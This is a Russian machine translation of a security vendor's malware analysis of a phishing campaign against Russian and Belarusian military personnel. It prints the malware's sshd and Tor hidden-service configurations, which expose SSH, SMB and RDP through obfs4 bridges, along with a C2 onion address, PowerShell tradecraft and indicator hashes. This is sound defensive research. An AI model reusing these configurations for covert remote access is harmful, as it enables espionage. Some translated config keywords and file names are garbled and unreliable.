Авторы: Сатвик Рам Пракки и Картиккумар Дживани.
Содержание:
- Введение
- Ключевые цели
- Отрасли
- Географический фокус
- Инфекция и приманки
- Технический анализ
- Стадия PowerShell
- Настойчивость
- Конфигурация
- Инфраструктура и атрибуция
- Заключение
- SEQRITE Protection
- МНК
- MITRE ATT & CK
Введение
SEQRITE В ходе исследования была выявлена кампания, нацеленная на военнослужащих России и Беларуси, особенно на российских десантников и белорусский спецназ. Цепочка заражения приводит к раскрытию множества локальных сервисов через Tor с использованием мостов obfs4, что позволяет злоумышленнику анонимно общаться через onion-адрес. В этом блоге мы рассмотрим цепочку заражения, которая включает в себя несколько этапов с использованием PowerShell, приманки, используемые для заманивания жертв, и раскрытие SSH как скрытого сервиса для разблокировки трафика для Tor при сохранении постоянного присутствия.
В этом году было выявлено несколько кампаний с похожей географической направленностью, например: Полое Перо В начале 2025 года была обнаружена атака, направленная на различные российские организации, такие как академические и исследовательские институты, напрямую связанные с государственным и оборонным секторами. В июле мы столкнулись с другой кампанией, получившей название CargoTalon которая нацелена на аэрокосмический и оборонный секторы России, используя имплантат «Орленок», где он пересекается с HeadMare В последнее время отслеживается атака на российский автомобильный сектор и сектор электронной коммерции с использованием CAPI Backdoor. MotorBeacon.
Ключевые цели
Отрасли
- Министерство обороны
Географический фокус
- Российская Федерация
- Республика Беларусь
Инфекция и приманки

Рис. 1 – Цепочка заражения
Первая приманка — это письмо-направление исполняющего обязанности командира в/ч 71289, в котором говорится о 83-й отдельной гвардейской десантно-штурмовой бригаде, дислоцированной в Уссурийске (Восточный военный округ), на имя начальника Воздушно-десантных войск (ВДВ) России с целью назначения военнослужащих. Уссурийск находится совершенно напротив продолжающейся российско-украинской войны, но ближе как к российско-китайской границе, так и к Тихому океану.

Рис. 2 – Ложная цель, нацеленная на Россию
Второе письмо-обманка предназначено для обучения военнослужащих с 13 октября.th 16th 2025 в воинской части 89417, которая относится к 5-й отдельной бригаде специального назначения белорусских войск специального назначения, дислоцированной в Марьиной Горке под Минском (согласно сообщениям, подразделение было расформировано в 2019 году, но некоторая активность наблюдалась в 2021 году).

Рис. 3 – Ложная цель, направленная на Беларусь
Технический анализ
Архивные файлы были загружены из Беларуси с датами изменения 15 октября 2025 г. и 21 октября 2025 г. Исходный фишинговый ZIP-архив содержит LNK-файл с двойным расширением, который расшифровывается следующим образом:
| Исходное имя файла | Переведенное имя |
| ТЛГ на событие на переподготовку.pdf.lnk | Отправление TLG на переподготовку.pdf.lnk |
| Исх №6626 Представление на звание на воинскую должность.pdf.lnk | Ссылка № 6626. Представление на назначение на военную должность.pdf.lnk |
Файлы ярлыков имеют идентификаторы машин «desktop-V7i6LHO» и «desktop-u4a2HgZ», которые, по-видимому, были использованы в качестве оружия в последнюю неделю сентября 2025 года. Они запускают команды PowerShell, которые действуют как начальный этап дроппера, где другой архивный файл рядом с LNK используется для настройки всей цепочки.

Рис. 4 – Файл ярлыка запускает PowerShell
Команда извлекает первый файл архива в один из каталогов:
- %APPDATA%\dynamicUpdatingHashingScalingContext
- %USERPROFILE%\Downloads\incrementalStreamingMergingSocket
и впоследствии использует его для извлечения второго архивного файла из папки 'НАЙДЕНА 000'. Это многоступенчатое извлечение сбрасывает полезные грузы в один из следующих вариантов:$env:APPDATA\logicpro' или "$env:APPDATA\reaper' каталоги, считывает содержимое текстового файла и выполняет его в фоновом режиме через скрытый процесс PowerShell.
- \logicpro\scalingEncryptingEncoding
- \reaper\responsiveHashingSocketScalableDeterministic
Прежде чем перейти к следующему этапу, давайте посмотрим на содержимое обоих архивов. Они содержат несколько EXE-файлов, текстовых файлов, обманный PDF-файл, DLL-библиотеку и несколько XML-файлов. Следуя вышеописанной цепочке, следующим этапом является выполнение скрипта PowerShell.

Рис. 5 – Содержимое архивных файлов
Стадия PowerShell
Скрипт начинает работу с проверки папки «Недавние» Windows на наличие в ней более десяти ярлыков. Это анти-анализ Проверьте, не попадает ли процесс в песочницу, и убедитесь, что пользователь ведет себя нормально. Также выполняется проверка, превышает ли число процессов 50 и открывается ли документ-обманка.

Рис. 6 – Антианализ PowerShell
Затем он создаёт мьютекс, чтобы гарантировать, что запущен только один экземпляр. После замены имени пользователя он считывает оба XML-файла и регистрирует запланированные задачи для их немедленного запуска. Это обеспечивает персистентность и выполняет следующий этап полезных нагрузок, определённых в этих XML-файлах. Несколько строк объединяются для формирования полного onion-адреса.

Рис. 7 – PowerShell stager
Затем он ждёт, пока не появится файл имени хоста, который Tor создаёт на основе конфигурации скрытого каталога сервиса. Таким образом, он ждёт, пока локальный экземпляр Tor запущено, и луковица доступна. Он создаёт идентификационный маяк в определённом формате.: :3-yeeifyem' или заканчивается на ':2-lrwkymi' и использует виться через локальный прослушиватель Tor SOCKS на порту 9050. Для обеспечения постоянства используются множественные флаги повтора.

Рис. 8 – локальное имя хоста для маяка
Настойчивость
XML-файлы представляют собой определения запланированных задач Windows, которые запускаются ежедневно, начиная с 2025-09-25T01:41:00-08:00 и имеет триггер входа в систему для указанного пользователя. Эти задачи скрыты и настроены на выполнение даже при бездействии компьютера, по запросу и без подключения к сети. Они игнорируют несколько экземпляров и не имеют ограничений по времени выполнения.

Рис. 9 – XML для сохранения

Рис. 10 – Запланированная задача
Наконец, переходим к EXE-файлам, которым файлы конфигурации передаются в качестве аргументов; некоторые из них, скорее всего, являются исполняемыми файлами SSH и SFTP-серверов, судя по путям PDB и внутренним именам. XML-файлы запускают либо первые, либо последние две команды (обе кампании включены):
- %AppData%/logicpro/githubdesktop.exe -f controllerGatewayEncrypting
- %AppData%/logicpro/pinterest.exe -f pipelineClusterDeployingCluster
- %AppData%/reaper/googlemaps.exe -f hashingBindingDynamicUpdatingSession
- %AppData%/reaper/googlesheets.exe -f decodingDistributedParsingHandlerRedundant
Оба формата githubdesktop.exe и googlemaps.exe сверху, вместе с ssh-shellhost.exe, ebay.exe (SFTP-сервер) и libcrypto.dll (LibreSSL) — это легитимные двоичные файлы «OpenSSH для Windows» с меткой времени компиляции 2023-12-13 и путями PDB:
- «C:\a_work\1\s\OSS_Microsoft_OpenSSH_Dev\bin\x64\Release\sshd.pdb»
- «C:\a_work\1\s\OSS_Microsoft_OpenSSH_Dev\bin\x64\Release\sftp-server.pdb»
- «C:\a_work\1\s\OSS_Microsoft_OpenSSH_Dev\bin\x64\Release\ssh-shellhost.pdb»
- C:\a_work\1\s\Libressl\libressl\build_X64\crypto\Release\libcrypto.pdb
libcrypto.dll объединено для шифрования, обмена ключами и хеширования; тогда как ssh-shellhost.exe Используется для интерактивных сеансов SSH. Это подтверждает, что злоумышленник разворачивает автономный сервер OpenSSH в каталоге профиля пользователя с помощью Tor, вероятно, для скрытого удалённого администрирования и сохранения уязвимости после эксплуатации.
Конфигурация
Первая конфигурация передана SSHD [githubdesktop.exe (или) googlemaps.exe] выглядит следующим образом, при этом единственное отличие между двумя кампаниями заключается в отсутствии подсистемы SFTP во второй. Наблюдается использование нестандартного порта 20321, пароли отключены и разрешены только по открытому ключу, а также по файлам, содержащим закрытые и авторизованные ключи. Файлы, содержащие эти ключи:
- избыточныйОптимизацияПеременныхЭкземпляраЛогирование
- избыточныйExecutingContainerIndexing
- инкрементальныйслияниеинкрементальныйнеизменяемыйпротокол
- loggingOptimizedDecoding
Порт 20321 СлушатьАдрес 127.0.0.1 HostKey избыточныйОптимизацияПеременнаяЭкземпляраЛогирование PubkeyAuthentication да Пароль Аутентификация нет AuthorizedKeysFile AppData\Roaming\logicpro\redundantExecutingContainerIndexing подсистема SFTP AppData\Roaming\logicpro\ebay.exe
Вторая конфигурация передается pinterest.exe (или) googlesheets.exe, что в основном tor.exe, который создаёт onion-сервис и предоставляет доступ к портам SSH, SMB, RDP и другим через Tor. Он настроен на использование подключаемого транспортного протокола obfs4 через EXE-файл с именем confluence.exe (или) rider.exe, который просто является obfs4proxy двоичныйНаблюдается использование мостов для сокрытия соединений. Конечные точки мостов определяются по IP-адресу, порту, отпечатку пальца, сертификату и режиму iat, чтобы разрешить исходящие соединения Tor через эти мосты.

Рис. 11 – Связь с мостами Tor
HiddenServiceDir "socketExecutingLoggingIncrementalCompiler/" Хидденсервицепорт 20322 127.0.0.1:20321 Хидденсервицепорт 11435 127.0.0.1:445 Хидденсервицепорт 13893 127.0.0.1:3389 Хидденсервицепорт 12192 127.0.0.1:12191 Хидденсервицепорт 14763 127.0.0.1:14762 GeoIPFile geoip GeoIPv6File geoip6 ClientTransportPlugin obfs4 exec confluence.exe UseBridges 1 Bridge obfs4 77.20.116.133:8080 2BA6DC89D09BFFA68947EF5719BFA1DC8E410FF3 cert=wILsetGQVClg0xNK5KWeKYCZJU48I9L+XiS4UVPfi3UQzU14lXuUhnuNiaeMzs2Z3yNfZw iat-mode=2 Bridge obfs4 156.67.24.239:33333 2F311EB4E8F0D50700E0DF918BF4E528748ED47C cert=xzae4w6xtbCRG4zpIH7AozSPI0h+lKzbshhkfkQBkmvB/DSKWncXhfPpFBNi5kRrwwVLew iat-mode=2
Таким же образом законно obfs4proxy.exe переименован и используется в конфигурации как confluence.exe и rider.exe.
Инфраструктура и атрибуция
Onion-ссылка, используемая для регистрации жертвы через Tor:
- yuknkap4im65njr3tlprnpqwj4h7aal4hrn2tdieg75rpp6fx25hqbyd[.]onion
Судя по последним данным о сетевом потоке данных с этих портов моста Tor, мы наблюдали трафик с Россией и даже с несколькими соседними странами. Эти IP-адреса относятся либо к сервисам Tor, либо к частным.
| Информация об IP | ASN | Страна | Категория |
| 77.20.116[.]133:8080 | 3209 (Vodafone GmbH) | Германия | жилой, прокси |
| 156.67.24[.]239:33333 | 51167 (Contabo GmbH) | Франция | тор |
| 146.59.116[.]226:50845 | 16276 (OVH SAS) | Польша | облако |
| 142.189.114[.]119:443 | 577 (БАКОМ) | Канада |
На 156.67.24[.]239:33333 и 77.20.116[.]133:8080 трафика гораздо меньше, тогда как на оставшихся двух IP-адресах, которые являются частью конфигурации и ложными целями, нацеленными на Россию, присутствует Россия.

Две группы, связанные с Россией, APT44 (песчаный червь) и APT28Ранее было замечено, что трояны используют Tor для связи с доменом Onion. Но в данном случае для обхода мониторинга сети используются специальные конфигурации подключаемого транспорта и SSHD, а сами атаки направлены на Россию и Беларусь. Аналогичные атаки были замечены и со стороны проукраинских APT-групп. Злой Лихо (Липкий Оборотень) и Пробуди Лихо (Core Werewolf), но SkyCloak пока остается неатрибутированным.
Заключение
Была выявлена многоцепочечная цепочка вторжений, нацеленная как на российских, так и на белорусских военнослужащих, которая ведёт к PowerShell Stager, развёртывающему мосты OpenSSH и Tor. Это демонстрирует скрытую кампанию, предназначенную для обеспечения скрытого удалённого доступа и горизонтальных перемещений в целевых средах. Судя по имеющимся данным, эта кампания, по-видимому, согласуется со шпионской деятельностью, связанной с Восточной Европой и направленной против оборонного и государственного секторов, хотя достоверность атрибуции по сравнению с ранее задокументированными операциями остаётся низкой.
SEQRITE Protection
- XML.Skycloak.50052.GC
- SCRIPT.Trojan.50053.GC
- СКРИПТ.Skycloak.50054
МНК
| Архив (ZIP) | |
| 952f86861feeaf9821685cc203d67004 | ТЛГ на событие на переподготовку.pdf |
| d246dfa9e274c644c5a9862350641bac | persistentHandlerHashingEncodingScalable.zip |
| 8716989448bc88ba125aead800021db0 | Исх №6626 Представление на звание на воинскую должность.pdf.zip |
| ae4f82f9733e0f71bb2a566a74eb055c | процессорContainerLogging.zip |
| Ярлык (LNK) | |
| 32bdbf5c26e691cbbd451545bca52b56 | ТЛГ на событие на переподготовку.pdf.lnk |
| 2731b3e8524e523a84dc7374ae29ac23 | Исх №6626 Представление на звание на воинскую должность.pdf.lnk |
| PowerShell (PS1) | |
| 39937e199b2377d1f212510f1f2f7653 | масштабированиеШифрованиеКодирование |
| 9242b49e9581fa7f2100bd9ad4385e8c | адаптивныйHashingSocketScalableDeterministic |
| XML | |
| b61a80800a1021e9d0b1f5e8524c5708 | loadingBufferFunctionHashing.xml |
| b52dfb562c1093a87b78ffb6bfc78e07 | incrementalRedundantRendering.xml |
| 45b16a0b22c56e1b99649cca1045f500 | синхронизацияContextBufferSchemaIncremental.xml |
| dcdf4bb3b1e8ddb24ac4e7071abd1f65 | frameworkRepositoryDynamicOptimized.xml |
| Текст | |
| e1a8daea05f25686c359db8fa3941e1d | контроллерШлюзШифрование |
| b3382b6a44dc2cefdf242dc9f9bc9d84 | pipelineClusterDeployingCluster |
| 229afc52dccd655ec1a69a73369446dd | hashingBindingDynamicUpdatingSession |
| f6837c62aa71f044366ac53c60765739 | декодированиеDistributedParsingHandlerRedundant |
| 2599d1b1d6fe13002cb75b438d9b80c4 | избыточныйExecutingContainerIndexing |
| b7ae44ac55ba8acb527b984150c376e2 | избыточныйОптимизацияПеременныхЭкземпляраЛогирование |
| 0f6aaa52b05ab76020900a28afff9fff | redundantOptimizingInstanceVariableLogging.pub |
| 219e7d3b6ff68a36c8b03b116b405237 | loggingOptimizedDecoding |
| dfc78fe2c31613939b570ced5f38472c | инкрементальныйслияниеинкрементальныйнеизменяемыйпротокол |
| 77bb74dd879914eea7817d252dbab1dc | инкрементальныйMergingIncrementalImmutableProtocol.pub |
| PE (EXE/DLL) | |
| f6c0304671c4485c04d4a1c7c8c8ed94 | githubdesktop.exe / googlemaps.exe (sshd.exe) |
| cdd065c52b96614dc880273f2872619f | pinterest.exe / googlesheets.exe (tor.exe) |
| 37e83a8fc0e4e6ea5dab38b0b20f953b | ebay.exe (sftp-server.exe) |
| 6eafae19d2db29f70fa24a95cf71a19d | ssh-shellhost.exe |
| 664f09734b07659a6f75bca3866ae5e8 | confluence.exe / rider.exe (obfs4proxy.exe) |
| 6eafae19d2db29f70fa24a95cf71a19d | libcrypto.dll |
| Приманки | |
| 23ad48b33d5a6a8252ed5cd38148dcb7 | ТЛГ на событие на переподготовку.pdf |
| c8c41b7e02fc1d98a88f66c3451a081b | Исх №6626 Представление о присвоении на воинскую должность.pdf |
| Тор-Бриджес | |
| 77.20.116[.]133:8080 156.67.24[.]239:33333
146.59.116[.]226:50845 142.189.114[.]119:443 |
|
| yuknkap4im65njr3tlprnpqwj4h7aal4hrn2tdieg75rpp6fx25hqbyd[.]onion | |
MITRE ATT & CK
| тактика | Идентификатор техники | Название техники |
| Развитие ресурсов | T1583 | Приобретение инфраструктуры |
| Первоначальный доступ | T1566.001 | Фишинг: Целевое фишинговое вложение |
| Типы | T1204.002 | Пользовательское выполнение: вредоносный файл |
| T1059.001 | Интерпретатор команд и сценариев: PowerShell | |
| T1106 | Родной API | |
| Настойчивость | T1053.005 | Запланированная задача |
| T1547 | Выполнение автозапуска загрузки или входа в систему | |
| T1027 | Замаскированные файлы или информация | |
| Уклонение от защиты | T1036 | Маскарад |
| T1497 | Уклонение от виртуализации/песочницы | |
| Дискавери | T1083 | Обнаружение файлов и каталогов |
| T1046 | Обнаружение сетевых служб | |
| T1033 | Обнаружение владельца системы/пользователя | |
| Боковое движение | T1021 | Удаленные Услуги |
| | T1119 | Автоматизированный сбор |
| Управление и контроль | T1071 | Протокол прикладного уровня |
| T1090 | доверенное лицо | |
| T1571 | Нестандартный порт | |
| эксфильтрации | T1041 | Эксфильтрация через канал C2 |



